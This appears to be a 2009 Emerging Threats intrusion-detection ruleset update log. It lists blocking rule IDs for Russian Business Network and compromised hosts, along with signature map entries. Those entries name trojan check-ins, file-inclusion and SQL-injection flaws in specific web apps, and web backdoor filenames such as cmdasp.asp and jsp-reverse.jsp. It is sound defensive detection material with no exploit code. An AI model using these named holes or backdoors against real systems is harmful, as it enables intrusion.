 2407202 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (203) (emerging-rbn-BLOCK.rules)
 2407203 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (204) (emerging-rbn-BLOCK.rules)
 2407204 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (205) (emerging-rbn-BLOCK.rules)
 2407205 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (206) (emerging-rbn-BLOCK.rules)
 2407206 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (207) (emerging-rbn-BLOCK.rules)
 2407207 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (208) (emerging-rbn-BLOCK.rules)
 2407208 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (209) (emerging-rbn-BLOCK.rules)
 2407209 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (210) (emerging-rbn-BLOCK.rules)
 2407210 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (211) (emerging-rbn-BLOCK.rules)
 2407211 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (212) (emerging-rbn-BLOCK.rules)
 2407212 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (213) (emerging-rbn-BLOCK.rules)
 2407213 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (214) (emerging-rbn-BLOCK.rules)
 2407214 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (215) (emerging-rbn-BLOCK.rules)
 2407215 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (216) (emerging-rbn-BLOCK.rules)
 2407216 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (217) (emerging-rbn-BLOCK.rules)
 2407217 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (218) (emerging-rbn-BLOCK.rules)
 2407218 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (219) (emerging-rbn-BLOCK.rules)
 2407219 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (220) (emerging-rbn-BLOCK.rules)
 2407220 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (221) (emerging-rbn-BLOCK.rules)
 2407221 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (222) (emerging-rbn-BLOCK.rules)
 2407222 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (223) (emerging-rbn-BLOCK.rules)
 2407223 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (224) (emerging-rbn-BLOCK.rules)
 2407224 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (225) (emerging-rbn-BLOCK.rules)
 2407225 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (226) (emerging-rbn-BLOCK.rules)
 2407226 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (227) (emerging-rbn-BLOCK.rules)
 2407227 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (228) (emerging-rbn-BLOCK.rules)
 2407228 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (229) (emerging-rbn-BLOCK.rules)
 2407229 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (230) (emerging-rbn-BLOCK.rules)
 2407230 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (231) (emerging-rbn-BLOCK.rules)
 2407231 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (232) (emerging-rbn-BLOCK.rules)
 2407232 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (233) (emerging-rbn-BLOCK.rules)
 2407233 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (234) (emerging-rbn-BLOCK.rules)
 2407234 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (235) (emerging-rbn-BLOCK.rules)
 2407235 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (236) (emerging-rbn-BLOCK.rules)
 2407236 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (237) (emerging-rbn-BLOCK.rules)
 2407237 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (238) (emerging-rbn-BLOCK.rules)
 2407238 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (239) (emerging-rbn-BLOCK.rules)
 2407239 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (240) (emerging-rbn-BLOCK.rules)
 2407240 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (241) (emerging-rbn-BLOCK.rules)
 2407241 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (242) (emerging-rbn-BLOCK.rules)
 2407242 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (243) (emerging-rbn-BLOCK.rules)
 2407243 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (244) (emerging-rbn-BLOCK.rules)
 2407244 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (245) (emerging-rbn-BLOCK.rules)
 2407245 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (246) (emerging-rbn-BLOCK.rules)
 2407246 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (247) (emerging-rbn-BLOCK.rules)
 2407247 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (248) (emerging-rbn-BLOCK.rules)
 2407248 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (249) (emerging-rbn-BLOCK.rules)
 2407249 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (250) (emerging-rbn-BLOCK.rules)
 2407250 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (251) (emerging-rbn-BLOCK.rules)
 2407251 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (252) (emerging-rbn-BLOCK.rules)
 2407252 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (253) (emerging-rbn-BLOCK.rules)
 2407253 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (254) (emerging-rbn-BLOCK.rules)
 2407254 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (255) (emerging-rbn-BLOCK.rules)
 2407255 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (256) (emerging-rbn-BLOCK.rules)
 2407256 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (257) (emerging-rbn-BLOCK.rules)
 2407257 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (258) (emerging-rbn-BLOCK.rules)
 2407258 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (259) (emerging-rbn-BLOCK.rules)
 2407259 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (260) (emerging-rbn-BLOCK.rules)
 2407260 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (261) (emerging-rbn-BLOCK.rules)
 2407261 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (262) (emerging-rbn-BLOCK.rules)
 2407262 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (263) (emerging-rbn-BLOCK.rules)
 2407263 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (264) (emerging-rbn-BLOCK.rules)
 2407264 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (265) (emerging-rbn-BLOCK.rules)
 2407265 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (266) (emerging-rbn-BLOCK.rules)
 2407266 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (267) (emerging-rbn-BLOCK.rules)
 2407267 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (268) (emerging-rbn-BLOCK.rules)
 2407268 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (269) (emerging-rbn-BLOCK.rules)
 2407269 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (270) (emerging-rbn-BLOCK.rules)
 2407270 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (271) (emerging-rbn-BLOCK.rules)
 2407271 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (272) (emerging-rbn-BLOCK.rules)
 2407272 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (273) (emerging-rbn-BLOCK.rules)
 2407273 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (274) (emerging-rbn-BLOCK.rules)
 2407274 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (275) (emerging-rbn-BLOCK.rules)
 2407275 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (276) (emerging-rbn-BLOCK.rules)
 2407276 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (277) (emerging-rbn-BLOCK.rules)
 2407277 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (278) (emerging-rbn-BLOCK.rules)
 2407278 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (279) (emerging-rbn-BLOCK.rules)
 2407279 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (280) (emerging-rbn-BLOCK.rules)
 2407280 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (281) (emerging-rbn-BLOCK.rules)
 2407281 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (282) (emerging-rbn-BLOCK.rules)
 2407282 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (283) (emerging-rbn-BLOCK.rules)
 2407283 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (284) (emerging-rbn-BLOCK.rules)
 2407284 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (285) (emerging-rbn-BLOCK.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-drop-BLOCK.rules (2):
        #  VERSION 1534
        #  Generated 2009-05-09 00:03:03 EDT

     -> Added to emerging-drop.rules (2):
        #  VERSION 1534
        #  Generated 2009-05-09 00:03:03 EDT

     -> Added to emerging-policy.rules (1):
        #by Juan Manuel Lorenzo at ossim

     -> Added to emerging-rbn-BLOCK.rules (2):
        #  VERSION 128
        #  Updated 2009-05-07 11:32:09

     -> Added to emerging-rbn.rules (2):
        #  VERSION 128
        #  Updated 2009-05-07 11:32:09

     -> Added to emerging-sid-msg.map (82):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecurityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Banbra || url,doc.emergingthreats.net/2009296
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Boaxxe || url,doc.emergingthreats.net/2009297
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Xprobe2 || url,doc.emergingthreats.net/2009298 || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009299
        2009300 || ET TROJAN Small.zon checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Small.zon || url,doc.emergingthreats.net/2009300
        2009301 || ET POLICY Megaupload file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009301
        2009302 || ET POLICY Badongo file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009302
        2009303 || ET POLICY MediaFire file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009303
        2009304 || ET POLICY Gigasize file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009304
        2009305 || ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zlob || url,doc.emergingthreats.net/2009305 || url,www.threatexpert.com/report.aspx?md5=1ca433d3f5538fda49c5defb59232f9d
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (82):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecurityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Banbra || url,doc.emergingthreats.net/2009296
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Boaxxe || url,doc.emergingthreats.net/2009297
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Xprobe2 || url,doc.emergingthreats.net/2009298 || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009299
        2009300 || ET TROJAN Small.zon checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Small.zon || url,doc.emergingthreats.net/2009300
        2009301 || ET POLICY Megaupload file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009301
        2009302 || ET POLICY Badongo file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009302
        2009303 || ET POLICY MediaFire file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009303
        2009304 || ET POLICY Gigasize file download service access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Download_Services || url,doc.emergingthreats.net/2009304
        2009305 || ET TROJAN Zlob post installation checkin (.php?inst_result=&hwid) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zlob || url,doc.emergingthreats.net/2009305 || url,www.threatexpert.com/report.aspx?md5=1ca433d3f5538fda49c5defb59232f9d
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
